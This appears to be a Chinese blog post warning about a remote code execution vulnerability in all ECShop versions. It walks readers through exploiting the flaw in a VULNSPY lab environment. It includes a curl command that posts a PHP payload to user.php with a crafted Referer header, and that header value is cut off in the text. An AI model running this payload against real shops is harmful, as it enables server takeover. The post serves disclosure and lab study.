漏洞预警 | ECShop 全系列版本远程代码执行高危漏洞

  • 内容
  • 相关

1.jpg


2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势,该漏洞可直接导致网站服务器沦陷,黑客可通过WEB攻击直接获得服务器权限,利用简单且危害较大。因此,阿里云安全专家提醒ECShop系统用户及时进行修复。 —— ECShop全系列版本远程代码执行高危漏洞分析

漏洞分析:

 

在线实验地址:

打开 VULNSPY ECSHOP 实验环境

 

漏洞利用

1. 点击右上方 START TO HACK 按钮创建 ECShop实验环境

2.png

2. 创建完成后打开 ECSHOP 实验地址

1.png


3. 发送 Payload 执行 phpinfo();

将**.vsplate.me换成您的实验地址*

在终端中执行:

curl http://***.vsplate.me/user.php -d 'action=login&vulnspy=phpinfo();exit;' -H 'Referer: 554fcae493e564ee0d


1.png


参考




本文标签:

版权声明:若无特殊注明,本文皆为《Admin木木》原创,转载请保留文章出处。

本文链接:漏洞预警 | ECShop 全系列版本远程代码执行高危漏洞 - http://www.hkphp.org/Loophole/32.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注

00:00 / 00:00
顺序播放